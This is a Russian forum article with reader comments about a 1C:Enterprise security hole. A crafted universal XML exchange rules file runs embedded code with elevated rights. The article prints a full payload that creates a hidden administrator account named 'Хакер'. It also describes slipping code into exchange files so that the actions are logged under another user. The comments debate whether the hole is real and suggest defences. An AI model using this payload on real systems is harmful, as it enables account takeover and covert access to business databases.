Обработка универсального обмена XML и информационная безопасность типовых решений.

Опубликовал Павел Колмаков (Stim213) в раздел Администрирование - Защита, права, пароли

Обработка универсального обмена XML - дыра в информационной безопасности типовых?
Статья к обсуждению.

Серверная база, настроены роли и РЛС, даже у главбуха нет доступа ко всем организациям. Административные права только у администратора, добавлять пользователей/роли только через служебные записки. Знакомо?
А теперь добавим в эту базу маленького скромного менеджера, у которого из прав только - выгружать/загружать данные. Либо непосредственно через обработку универсального обмена XML, либо через справочник настройки обмена(права на обработку - только использование).
Казалось бы, загружать/выгружать данные менеджер может только те, которые ему доступны. Теоретически это так, однако при серьезном подходе через эту обработку он может получить полный и неограниченный доступ к БД. Например, если ему доступна форма обработки, он может создать файл xml, с кодом:

(ПравилаОбмена)
(ВерсияФормата)
2.01
(/ВерсияФормата)
(Ид)
e4d7c6e2-e768-43ee-ac67-18c27fe63791
(/Ид)
(Наименование)
УправлениеТорговлей 11 --) УправлениеТорговлей 11
(/Наименование)
(ДатаВремяСоздания)
2013-04-13T21:59:02
(/ДатаВремяСоздания)
(Источник ВерсияПлатформы="8.0" ВерсияКонфигурации="11.0.9.14" СинонимКонфигурации="Управление торговлей, редакция 11.0")
УправлениеТорговлей
(/Источник)
(Приемник ВерсияПлатформы="8.0" ВерсияКонфигурации="11.0.9.14" СинонимКонфигурации="Управление торговлей, редакция 11.0")
УправлениеТорговлей
(/Приемник)
(ПослеЗагрузкиПравилОбмена)
УстановитьПривилегированныйРежим(Истина); Пользователь = ПользователиИнформационнойБазы.СоздатьПользователя(); Пользователь.Имя = "Хакер"; Пользователь.АутентификацияСтандартная = Истина; Пользователь.Роли.Добавить(метаданные.роли.ПолныеПрава); Пользователь.Роли.Добавить(метаданные.роли.Администрирование); Пользователь.Записать();
(/ПослеЗагрузкиПравилОбмена)
(Параметры/)
(Обработки/)
(ПравилаКонвертацииОбъектов/)
(ПравилаВыгрузкиДанных/)
(ПравилаОчисткиДанных/)
(Алгоритмы/)
(Запросы/)
(/ПравилаОбмена)

и загрузить этот файл, как правило обмена. Прочитать правила обработкой и получить пользователя с полными и административными правами к базе. аналогичным образом можно вывести любую информацию, привилегированный режим позволит выполнить любой запрос к базе данных.
Если нет доступа к обработке, но пользователь совершает загрузку данных - аналогично подменяется xml-файл загрузки.

Вот такие дела вобщем. Проверено на серверной базе. Типовой. Возможно, все об этом и так знали, но кто-то возможно и задумается. давать право выполнять обмены пользователю с неполными правами - значит дать ему полный доступ к вашей базе данных. А раз такой доступ ему не полагается - значит, вы рискуете информационной безопасностью. Может вам повезет. А может и нет, решать вам.

 

зы. И кстати, не обязательно иметь доступ к этой обработке и базе вообще. достаточно иметь доступ к файлу выгрузки, который будет загружаться в вашу базу. В него можно добавить свой код, который выполнится тем человеком(или роботом), который выполняет обмен. После выполнения обмена файл удалится, а все действия в журнале регистрации будут записаны от имени того, кто выполнял обмен. И никаких следов, все чисто.

См. также

Лучшие комментарии

5. Евгений (wirg) 15.04.2013 14:19
Кстати не стоит недооценивать сообразительность офисного планктона. Вот случай из реальной жизни: довелось мне (еще в эпоху 7.7) автоматизировать ресторан. Технические подробности не очень интересны, но смысл в том, что счет клиенту выводился на экран, официант его распечатывал и нес получившему удовольствие челу. Однажды меня вызвонил разгневанный хозяин и показал счет, в котором сумма по строкам оказалась не равна общей сумме. Как показало следствие я забыл включить защиту для табличного документа mxl, а догадливый официант эту фишку просек и стал спокойно править итоговую сумму, в какую сторону сами знаете. В общем теперь руководствуюсь принципом: любая лазейка рано или поздно будет обнаружена и использована.
# Ответить
2. Сергей Ожерельев (Поручик) 15.04.2013 13:42
(0) Маленький скромный менеджер со знанием архитектуры и нюансов среды.
Ржал, как последняя кобыла.
Ответили: (6)
# Ответить
1. andrewks 15.04.2013 13:34
1С - доступно и всерьёз ©
Ответили: (18)
+ 1 [ yuraos; ]
# Ответить

Комментарии

1. andrewks 15.04.2013 13:34
1С - доступно и всерьёз ©
Ответили: (18)
+ 1 [ yuraos; ]
# Ответить
2. Сергей Ожерельев (Поручик) 15.04.2013 13:42
(0) Маленький скромный менеджер со знанием архитектуры и нюансов среды.
Ржал, как последняя кобыла.
Ответили: (6)
# Ответить
3. andrewks 15.04.2013 13:48
После выполнения обмена файл удалится


почему удалится?
Ответили: (7)
# Ответить
4. Сергей Ожерельев (Поручик) 15.04.2013 14:03
После выполнения обмена файл удалится

Тоже вброшу. С чего бы? В типовых обменах он остаётся на месте, там и близко нет удаления.
Ответили: (7)
# Ответить
5. Евгений (wirg) 15.04.2013 14:19
Кстати не стоит недооценивать сообразительность офисного планктона. Вот случай из реальной жизни: довелось мне (еще в эпоху 7.7) автоматизировать ресторан. Технические подробности не очень интересны, но смысл в том, что счет клиенту выводился на экран, официант его распечатывал и нес получившему удовольствие челу. Однажды меня вызвонил разгневанный хозяин и показал счет, в котором сумма по строкам оказалась не равна общей сумме. Как показало следствие я забыл включить защиту для табличного документа mxl, а догадливый официант эту фишку просек и стал спокойно править итоговую сумму, в какую сторону сами знаете. В общем теперь руководствуюсь принципом: любая лазейка рано или поздно будет обнаружена и использована.
# Ответить
6. Александр Капустин (kapustinag) 15.04.2013 14:26
(2) Поручик, Думаю, тут не до смеха все-же. Потому что, даже если не найдется "маленького и скромного менеджера со знанием и т д.", у менеджера может найтись друг/знакомый/враг/иной человек, от которого тот зависит, который сможет сделать файл для подмены, и подменить его руками менеджера.
+ 1 [ amon_ra; ]
# Ответить
7. Александр Капустин (kapustinag) 15.04.2013 14:46
(3) andrewks, (4) Поручик, Конечно, файл не удалится. Но следующий файл, пришедший по обмену, имеет то же самое имя. Поэтому, если никакого архивирования файлов обмена не делается, файл будет затерт более новым файлом. Концы в воду.

Конечно, Вы это и так знаете. То есть, автор не очень четко написал о последствиях. Но проблема все-равно имеется, это ясно.
Ответили: (8)
# Ответить
8. andrewks 15.04.2013 15:16
(7) kapustinag,
Но проблема все-равно имеется, это ясно

угу. даёшь защищённый документооборот для обменов!
# Ответить
9. Ийон Тихий (cool.vlad4) 15.04.2013 15:28
я это заметил еще в http://forum.infostart.ru/forum26/topic38078/message431224/#message431224 , но как-то мысль тогда не развил. но без сомнений - это дыра.
# Ответить
10. Призрак (davdykin) 15.04.2013 18:05
Однако, даже не думал в этом направлении, статья безусловно интересная и наводит на определенные размышления. Так что возможно скоро будут фильмы про "Хакеров 1С" :). А на счет офисного планктона - так любопытство - хуже злого умысла.
# Ответить
11. Яков Коган (Yashazz) 15.04.2013 18:12
Архивировать с паролем надо эти файлы обмена, вот что. Хоть какая защита будет. Или передавать так, чтоб перехватить не было возможности, или com-xml-обмен гонять.
Ответили: (12)
# Ответить
12. Павел Колмаков (Stim213) 15.04.2013 21:23
(11)Архивировать безусловно надо, равно как и настроить доступ к каталогу обмена(если речь идет о спр настройка обмена данными).
Но если есть доступ к обработке унив обмена XML, то все бесполезно.
# Ответить
13. Павел Колмаков (Stim213) 15.04.2013 23:06
+ форматирование кода ни к черту, заменил теги скобками
# Ответить
14. Роман Озеряный (rozer) 16.04.2013 08:36
уфф, хорошо что у нас "самописка" на 8.1... УстановитьПривилегированныйРежим(Истина) придумали только в 8.2 :) Хотя в "ПослеЗагрузкиПравилОбмена" можно добавить и любую деструкцию... например удалить непосредственно если роль позволяет :(
# Ответить
15. Алексей Соловьев (Silenser) 16.04.2013 11:29
Прошу прощения, а в какой вселенной у
скромного менеджера
права на
выгружать/загружать данные. Либо непосредственно через обработку универсального обмена XML, либо через справочник настройки обмена(права на обработку - только использование).
, то есть фигурально выражаясь, права на внешние обработки или доступ к системным настройкам обменов? При таком подходе они на флешке такого принесут, что потом бекап не спасет. Если уж нужно что-то универсальное, пишите оболочку над универсалкой и ставьте пароль на архив файла обмена. Тут нужно исходить из законов Мерфи, если пользователи могут что-то поломать - они поломают, надеяться на здравый смысл бесполезно.
# Ответить
16. soba (soba) 16.04.2013 16:26
Вот это дырочка! Похоже при настройке обменов нужно жестко все прописывать без возможности изменения, отключать достп к файлам обмена и шифровать/дешифровать на этапе транспортировки. Код получения доступа зачетный. И, кстати, никто ведь не мешает с правами админа зачистить логи по получению прав. Или я не прав?
Ответили: (17)
# Ответить
17. Sergey S (stagov) 17.04.2013 00:59
(16) soba,
А разве она там одна!? Ваше удивление просто обескураживает.
Ответили: (23)
# Ответить
18. Юрий Осипов (yuraos) 17.04.2013 06:20
(1) andrewks,

1С - доступно и всерьёз ©

Hackers of all Wold - HACK IT !!!
# Ответить
19. Сергей Кучеров (СергейКа) 17.04.2013 06:42
На самом деле есть некоторые нюансы :)
Данный код сработает не всегда и не везде.
Дырка безусловно есть, но не все так страшно.
# Ответить
20. Александр (МимохожийОднако) 17.04.2013 07:42
1С по своей сути мало приспособлена для защиты информации от чтения и\или изменения.
Ответили: (21)
# Ответить
21. Павел Колмаков (Stim213) 17.04.2013 11:05
(20) Особенно файловая база :)
# Ответить
22. Павел Колмаков (Stim213) 17.04.2013 11:28
+ практическое продолжение статьи:
http://infostart.ru/public/183336/
# Ответить
23. soba (soba) 17.04.2013 13:46
(17) stagov, Ну такая действительно удивила. Как-то не приходилось в этом направлении ковыряться
Ответили: (24)
# Ответить
24. Sergey S (stagov) 17.04.2013 14:15
(23) soba,
таки да. народ то наш придумковатый. и любознательный
# Ответить
25. Юленька (s_uu) 18.04.2013 16:32
а нельзя настроить автоматический обмен??
Ответили: (26)
# Ответить
26. Юрий Осипов (yuraos) 18.04.2013 16:49
(25) s_uu,
в каком смысле автоматический обмен?
спамить по почте файликами с хакерской ХМЛ-загрузкой
и подламывать всем 1С-ки ???
+ 1 [ Stim213; ]
# Ответить
27. Александр Зубцов (iov) 22.04.2013 12:02
способ этот известен. он позволяет даже больше. Но на всеобщее не был выложен... Чтож теперь нужны статьи как защищаться.
Хотя решения аналогичны тем которые используют при конфиденциальной передаче информации.
Хотя говорить о защищенности 1С вообще не стоит.
# Ответить
28. Сергей Маслов (LexSeIch) 22.04.2013 13:02
Мир этому дому!
Автору спасибо за статью. Предупрежден - значит вооружен. Хотя на счет вооружен - погорячился... Защитится от деструктивных действий пользователей не просто. Статус (или ответственность) человека делающего обмен повышается. "Практические приложения" - появляются и будут расти как грибы...
# Ответить
29. Андрей Овсянкин (Evil Beaver) 22.04.2013 14:01
Не хочется лезть проверять, но разве код из правил не выполняется в безопасном режиме? Если так, то УстановитьПривилегированныйРежим не сработает.
Ответили: (35)
+ 1 [ Bassgood; ]
# Ответить
30. Юрий Осипов (yuraos) 22.04.2013 17:42
Проверка спама из рубрики "Выбор экспертов" (дубль 1).
Ответили: (31)
# Ответить
31. Юрий Осипов (yuraos) 22.04.2013 18:13
(30)
Проверка спама из рубрики "Выбор экспертов" (дубль 2).
# Ответить
32. ta44ik (ta44ik) 25.04.2013 04:11
А еще это способ восстановить пароль - точнее создать пользователя с правами на конфигуратор) Всякое же бывает)
# Ответить
33. ivanov660 ivanov660 (ivanov660) 28.04.2013 21:57
Вроде это баян. Всем давно известно, что использование универсального обмена без контроля может обернуться проблемами, я сам, частенько, когда что-то отлаживаю правлю код прямо в xml файле.
Однако, можно использовать бекап sql-серверов, защищенные папки для обмена (глупо использовать папку для обмена с общим доступом), использовать антивирусы и др. стандартные средства.
+ 1 [ kereo; ]
# Ответить
34. 06.05.2013 18:52
(0) А зачем вообще заморачиваться именно с обработкой обмена?
Если у пользователя есть право использования внешних отчетов/обработок, то аналогичный код он может прописать в своей собственной обработке/отчете и запустить его в режиме предприятия, результат будет тот же, только морочиться придется меньше.
# Ответить
35. 06.05.2013 19:36
(0) Судя справке синтакс-помощника к методу "УстановитьПривилегированныйРежим()" - в клиент-серверном режиме работы базы метод управляет привилегированным исполнением кода только при его вызове на стороне сервера, т.е. в обычном режиме работы конфигурации через обработки/отчеты установить этот режим не получится (модуль объекта и формы исполняются на стороне клиента), то что касается управляемых форм, то для предотвращения таких случаев необходимо использовать метод "УстановитьБезопасныйРежим()", о чем было упомянуто в (29).
Т.е. получается, что права на использование внешних штук куда более опасная вещь, нежели права на выполнение обменов данными.
# Ответить
36. 1 (gradus) 12.05.2013 23:06
Проверено на серверной базе.

Интересно, а файловый режим работы с базой данных будет иметь эту уязвимость? Или там своих хватает) ?
Ответили: (38)
# Ответить
37. Алексей (alexqc) 13.05.2013 09:46
Одно из первейших правил: никакого выполнения пользовательских данных!
# Ответить
38. Max Sit (xamass) 29.10.2014 16:05
(36) gradus, Выгрузка загрузка данных не зависит от среды хранения базы
# Ответить
Внимание! За постинг в данном форуме $m не начисляются.
Внимание! Для написания сообщения необходимо авторизоваться
Текст сообщения*
Прикрепить файл